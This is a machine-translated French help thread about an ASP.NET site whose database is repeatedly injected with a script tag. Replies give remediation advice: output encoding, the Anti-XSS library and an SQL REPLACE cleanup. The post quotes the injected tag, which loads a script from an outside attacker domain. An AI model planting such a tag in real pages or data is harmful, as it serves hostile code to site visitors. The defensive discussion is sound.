2010-09-23 3 views
5

Je suis dans une très grosse difficulté. S'il vous plaît aider !!!!!!!!!!Attaque XSS sur le site ASP.NET

Mon site Web a été attaqué par un script malveillant </title> < script src = http: // google-stats50.info/ur.php>. Ce script est ajouté automatiquement à n'importe quelle colonne d'une table. J'ai supprimé ce script. Mais après quelques heures, il réapparaissait dans certaines tables. Mais cette fois c'est </title> < script src = http: // google-stats49.info/ur.php>.

Mon client se plaint du script. La technologie utilisée est ASP.NET 1.1, SQL SERVER 2005.

Aidez-nous s'il vous plaît.

Merci d'avance !!!!!!

Répondre

2

Arrêtez le site. Votre serveur peut ou ne peut pas être vissé maintenant.

Vous devez savoir où les changements viennent - Base de données ou d'un système de fichiers

Si c'est le DB alors vous pouvez être ok, quelqu'un est probablement par injection sql. Définissez les autorisations pour que la base de données ne puisse pas être mise à jour par le site pour le moment tant que vous n'avez pas trouvé le point SQL INJECTION.

Si c'est votre système de fichiers, vous devez probablement effacer et réinitialiser le site. Ils sont dedans et vous ne vous en débarrasserez pas. Trouvez votre point d'entrée, mais ce sera difficile.

+1

Aussi, essayez de désinfectez (ne permettant pas html/js) vos entrées utilisateurs. – sheeks06

+0

nous chargeons le contenu sur le site Web de tiers grâce à la technologie de script ... c'est le but de mon site Web .... y at-il un moyen de le résoudre dès que possible – user423719

+0

Probablement beaucoup trop tard maintenant, mais si des choses comme ça se produisent habituellement besoin d'embaucher un expert. Un expert très cher. – Dann

4

Lorsque vous restituez le texte à partir de la base de données, vous pouvez utiliser deux méthodes pour éviter ce script.

  1. Utilisateur Server.HtmlEncode(DataFromDatabase);
  2. Utilisez les Microsoft Anti-Cross dll library qui ont une fonction similaire avec plus d'options.

Last MS Anti-XSS library now est de 3.1.
How to using video

Comment ils transmettent ce script.

  1. Sur le contact ou d'autres formes.
  2. Sur la référence du navigateur sur les statistiques et quand ils naviguent sur votre site, vous gardez un journal à ce sujet et quand vous allez voir ce journal, le script est en cours d'exécution.

Espérons cette aide.

+0

Ok..thanks ..... Je vais mettre en œuvre ces préventions dans mon application. Mais existe-t-il une solution rapide pour supprimer le script? – user423719

+0

Je ne sais pas comment ils passent ce script et l'injectent dans la base de données. – user423719

+0

@ user423719 J'ai tapé sur ma réponse 2 façons possibles d'injecter, à partir des formulaires de contact, ou à partir des données du navigateur que vous vous connectez. Ne supprimez pas le script, faites-le simplement pour ne pas courir, puis trouvez comment est entré et si vous voulez, vous pouvez faire plus de mesures. – Aristos

0

Je vous recommande de supprimer toute la liaison d'hostheader externe dans les services Internet (IIS). Cela vous permet de localiser le problème localement sans client de la vôtre peut être infecté/être volé

0

Un remède rapide

suivant n'est pas une solution, mais avec cela, vous pouvez supprimer le script de la base de données dans un requête unique. C'est ce que je fais pour l'instant :).


UPDATE Table_Name SET nom_colonne = REPLACE (CAST (COLUMN_NAME AS nvarchar (MAX)), « http://google-stats49.info/ur.php> ',' ')


Celui-ci fonctionne comme le trouver et remplacer des choses dans le mot. Si vous trouvez des informations sur le script de virus, publiez-le ici.

Cordialement, Masood

+0

Salut les gars, a obtenu un autre lien d'injection. Il semble que celui-ci soit injecté par le même bot. Je ne peux pas poster le lien ici.book

+0

il apparaît encore et encore. J'ai chiffré les informations sensibles dans le fichier Web.config. Je pense que cela a empêché le script de réapparaître pendant environ 24 heures. Mais c'est encore venu. S'il vous plaît aider. – user423719

0

même problème ici ... il a commencé sur les 15,30 et infectent 4 tables ... voici la solution pour la recherche de base de données complète: il suffit d'éditer http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html pour retourner les noms de tables distinctes.

et cela fonctionnera comme Masood mentionner

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '') 
Questions connexes